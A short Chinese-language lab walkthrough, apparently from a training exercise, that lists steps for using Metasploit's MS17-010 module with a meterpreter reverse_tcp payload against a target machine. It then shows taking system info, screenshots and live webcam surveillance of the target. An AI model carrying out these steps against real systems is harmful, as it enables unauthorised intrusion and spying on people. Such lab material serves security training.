- 在攻击机上启动metspoloit
- 查找 MS17-010 漏洞利用模块
3. 使用 ms17-010 攻击模块,查看相应的 Payloads
4.选择并设置 set payload windows/x64/meterpreter/reverse_tcp 攻击载荷,查看所需配置参数show options
5.在靶机上查看 IP 地址
6.在攻击机上查看 IP 地址
7.配置 RHOST 和 LHOST 参数
8.在攻击机上执行 exploit/run,发起溢出攻击,攻击成功反弹返回 meterpreter shell
9.使用 sysinfo 命令查看靶机信息
10.使用 ipconfig 查看靶机 IP 信息
11.使用 screenshot 截取靶机桌面图像
12.在攻击机上查看截的图片
13.开启靶机的摄像头实时监控